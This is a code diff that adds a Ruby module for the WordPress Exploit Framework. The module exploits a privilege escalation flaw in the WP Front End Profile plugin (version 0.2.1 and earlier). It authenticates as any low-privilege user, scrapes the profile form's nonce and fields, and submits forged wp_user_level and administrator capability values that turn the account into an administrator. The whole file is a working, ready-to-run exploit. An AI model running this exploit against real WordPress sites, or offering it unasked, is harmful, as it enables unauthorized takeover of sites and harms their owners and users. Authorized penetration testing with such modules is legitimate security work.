|
| 1 | +class Wpxf::Auxiliary::WpFrontEndProfilePrivilegeEscalation < Wpxf::Module |
| 2 | + include Wpxf |
| 3 | + |
| 4 | + def initialize |
| 5 | + super |
| 6 | + |
| 7 | + update_info( |
| 8 | + name: 'WP Front End Profile <= 0.2.1 Privilege Escalation', |
| 9 | + desc: 'The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated '\ |
| 10 | + 'users of any user level to escalate their user role to an administrator.', |
| 11 | + author: [ |
| 12 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 13 | + ], |
| 14 | + references: [ |
| 15 | + ['WPVDB', '8620'] |
| 16 | + ], |
| 17 | + date: 'Sep 15 2016' |
| 18 | + ) |
| 19 | + |
| 20 | + register_options([ |
| 21 | + StringOption.new( |
| 22 | + name: 'username', |
| 23 | + desc: 'The WordPress username to authenticate with', |
| 24 | + required: true |
| 25 | + ), |
| 26 | + StringOption.new( |
| 27 | + name: 'password', |
| 28 | + desc: 'The WordPress password to authenticate with', |
| 29 | + required: true |
| 30 | + ), |
| 31 | + StringOption.new( |
| 32 | + name: 'profile_form_path', |
| 33 | + desc: 'The path to the page containing the profile editor form', |
| 34 | + required: true |
| 35 | + ) |
| 36 | + ]) |
| 37 | + end |
| 38 | + |
| 39 | + def check |
| 40 | + check_plugin_version_from_readme('wp-front-end', '0.2.2') |
| 41 | + end |
| 42 | + |
| 43 | + def username |
| 44 | + datastore['username'] |
| 45 | + end |
| 46 | + |
| 47 | + def password |
| 48 | + datastore['password'] |
| 49 | + end |
| 50 | + |
| 51 | + def profile_form_url |
| 52 | + normalize_uri(full_uri, datastore['profile_form_path']) |
| 53 | + end |
| 54 | + |
| 55 | + def form_fields_with_default_values(cookie) |
| 56 | + res = execute_get_request(url: profile_form_url, cookie: cookie) |
| 57 | + return nil unless res && res.code == 200 |
| 58 | + |
| 59 | + fields = {} |
| 60 | + res.body.scan(/<input.+?name="(.+?)".+?value="(.*?)".*?>/i) do |match| |
| 61 | + if match[0].start_with?('wpfep_nonce_name', '_wp_http_referer', 'profile[') |
| 62 | + emit_info "Found field #{match[0]}", true |
| 63 | + fields[match[0]] = match[1] |
| 64 | + end |
| 65 | + end |
| 66 | + |
| 67 | + fields |
| 68 | + end |
| 69 | + |
| 70 | + def run |
| 71 | + return false unless super |
| 72 | + |
| 73 | + cookie = authenticate_with_wordpress(username, password) |
| 74 | + return false unless cookie |
| 75 | + |
| 76 | + emit_info 'Requesting profile editor form...' |
| 77 | + form_fields = form_fields_with_default_values(cookie) |
| 78 | + |
| 79 | + if form_fields.nil? |
| 80 | + emit_error 'Failed to retrieve the profile form' |
| 81 | + return false |
| 82 | + end |
| 83 | + |
| 84 | + form_fields['profile[wp_user_level]'] = 10 |
| 85 | + form_fields['profile[wp_capabilities][administrator]'] = 1 |
| 86 | + form_fields['profile[wpfep_save]'] = 'Update Profile' |
| 87 | + |
| 88 | + emit_info 'Elevating privileges...' |
| 89 | + execute_post_request(url: profile_form_url, cookie: cookie, body: form_fields) |
| 90 | + end |
| 91 | +end |
0 commit comments